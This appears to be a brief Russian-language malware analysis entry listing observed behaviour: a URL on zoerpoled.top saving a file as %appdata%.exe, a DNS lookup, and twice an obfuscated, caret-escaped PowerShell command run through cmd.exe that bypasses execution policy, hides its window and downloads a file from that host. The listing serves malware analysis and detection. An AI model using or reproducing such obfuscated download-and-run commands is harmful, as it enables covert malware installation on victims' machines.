Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^wErSheLl^.^EXe -eXEc^uT^I^ON^p^olIc^Y^ ^b^yp^as^S -nop^R^of^Il^E -WInD^oWsT^y^lE^ HiddeN^ (^n^EW-obJ^E^Ct S^ySt^eM^.nEt.weB^c^LIent).D^OwNloA^Df^I^Le('http://www.zoerpoled.to...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pO^wErSheLl^.^EXe -eXEc^uT^I^ON^p^olIc^Y^ ^b^yp^as^S -nop^R^of^Il^E -WInD^oWsT^y^lE^ HiddeN^ (^n^EW-obJ^E^Ct S^ySt^eM^.nEt.weB^c^LIent).D^OwNloA^Df^I^Le('http://www.zoerpoled.to...' (со скрытым окном)